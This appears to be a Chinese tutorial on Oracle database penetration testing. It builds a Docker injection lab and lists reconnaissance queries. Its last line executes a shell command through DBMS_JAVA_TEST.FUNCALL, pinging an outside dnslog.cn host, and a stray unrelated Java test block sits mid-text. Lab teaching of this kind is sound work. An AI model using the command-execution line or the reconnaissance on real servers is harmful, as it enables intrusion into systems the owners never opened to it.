• Oracle 数据库的渗透测试
    • Oracle 注入靶场搭建
      • ✅Oracle 数据库服务搭建
      • ✅WEB 连库测试
      • ✅SQL注入靶场启动
    • 针对Oracle 的数据库渗透测试
      • ✅常用Oracle 数据库渗透语句
      • ❎简单渗透实例

参考链接:Oracle爆错手工注入

oracle数据库注入靶场搭建

oracle服务启动

使用docker进行oracle数据库渗透测试,环境如下:

docker启动oracle

#dba连接
  • 命令一览
// docker下载oracle数据库镜像
docker pull registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
##docker将镜像加载到名称为oracle的容器后台运行并映射镜像1521端口到本地1521端口
docker run -d -p 1521:1521 --name oracle registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
<!--进入oracle容器的交互式shell-->
docker exec -it oracle bash

sqlplus /nolog
SQL> conn sys/oracle as sysdba
Connected.

SQL> select name from v$database;

NAME
---------
XE

public class hello {
    
      public static void main(String[] args) {
              #aasdasdasd
              System.out.println("this is a block test message");
              System.out.println("hello world");
    
      }
  }
  • 新增用户赋权

web连库

SQL> create tablespace pentest datafile '/tmp/pentest.dbf' size 100m;

Tablespace created.

SQL> create user pentest identified by pentest default tablespace pentest;

User created.

SQL> grant connect,resource,dba to pentest;

Grant succeeded.

SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
root@bd849e50bab4:/# sqlplus pentest/pentest

SQL*Plus: Release 11.2.0.2.0 Production on Fri Feb 19 06:38:04 2021

Copyright (c) 1982, 2011, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> CREATE TABLE users (id number,name varchar(500),surname varchar(1000));

Table created.

SQL> INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming');
INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (http://sqlmap.org)', 'user agent header');
INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
commit;
1 row created.

SQL> 
1 row created.

SQL> 
1 row created.

SQL> 
1 row created.

SQL> 
1 row created.

SQL> commit;

Commit complete.

SQL> SELECT * FROM users where id=1;

	ID
----------
NAME
--------------------------------------------------------------------------------
SURNAME
--------------------------------------------------------------------------------
	 1
luther
blisset

渗透常用语句:


1 当前用户权限 
select * from session_roles
2 当前数据库版本 
select banner from sys.v_$version where rownum=1
3 服务器出口IP 
用utl_http.request 可以实现
4 服务器监听IP d
select utl_inaddr.get_host_address from dual
5 服务器操作系统
select member from v$logfile where rownum=1
6 服务器sid查询,远程连接的话需要
select instance_name fromv$instance;
7 当前连接用户
select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual

版本:

select * from v$version;

Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
PL/SQL Release 11.2.0.4.0 - Production
CORE	11.2.0.4.0	Production
TNS for Linux: Version 11.2.0.4.0 - Production
NLSRTL Version 11.2.0.4.0 - Production

oracleShell.jar环境

Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
PL/SQL Release 11.2.0.1.0 - Production
"CORE	11.2.0.1.0	Production"
TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
NLSRTL Version 11.2.0.1.0 - Production

select utl_inaddr.get_host_address from dual

172.17.0.2

补丁:

select * from dba_registry_history;


2018-04-25 12:22:17.105985	APPLY	SERVER	11.2.0.4	0	PSU	Patchset 11.2.0.2.0

权限:

select * from session_roles;

CONNECT
RESOURCE
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_SELECT_ROLE
EXECUTE_CATALOG_ROLE
HS_ADMIN_EXECUTE_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
SCHEDULER_ADMIN
WM_ADMIN_ROLE
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','ping ojuht0.dnslog.cn') from dual;